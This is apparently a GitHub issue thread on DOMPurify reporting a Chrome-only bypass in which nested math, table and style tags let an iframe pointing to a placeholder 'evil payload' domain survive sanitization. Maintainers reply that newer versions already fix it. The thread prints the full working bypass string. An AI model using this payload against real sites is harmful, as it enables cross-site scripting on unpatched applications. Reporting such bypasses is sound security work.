### ISSUE TITLE
Fails to sanitize iframe when prefixed by broken tags in Chrome

### ISSUE THREAD

**Issue by coldcandor** [cure53/DOMPurify#472]
> This issue proposes a bug which...

### Background & Context

We recently discovered a security issue where a XSS attack was succeeding to run a <script> tag from another domain from an <iframe>, despite running it through dompurify with the following setup:

```
export const getSanitizedMarkup = (obj): { __html: string } => {
  const purifyConfig = {
    ADD_ATTR: ['target'],
  };
  const sanitized = purify.sanitize(obj, purifyConfig);
  return { __html: sanitized };
};
```

This does NOT occur in FireFox.  Confirmed in Chrome.  As of yet, I have not testing in IE 11 or Edge, but since Edge is based on Chromium now, it seems likely.  I did not take the time (dealing with this high-severity incident for my company) to trial and error if one of the specific broken tags triggers the issue when others do not.

#### Input

The HTML used to bypass dompurify:

```
Testy1<math><mtext><table><mglyph><style><math><table id=\"</table>\"><iframe width=\"10\" name=\"iframe name\" height=\"90\" src=\"<DOMAIN_WITH_EVIL_PAYLOAD>\" border=\"0\" frameborder=\"0\" scrolling=\"no\" align=\"left\" hspace=\"0\" vspace=\"0\"></iframe>2
```

The content of the payload was an alert box for easy testing:

```
<html>
  <script>alert('XSS Test for Chrome')</script>
</html>
```

#### Given output

Output string was unchanged

#### Expected output

The <iframe> was removed from the output string.

**Comment by coldcandor** [comment]
My bad!  Looks like this has been fixed between my installed version and the most recent.  Closing issue.

**Comment by cure53** [comment]
Thanks for filing this, and phew, yes - we got that one already :)
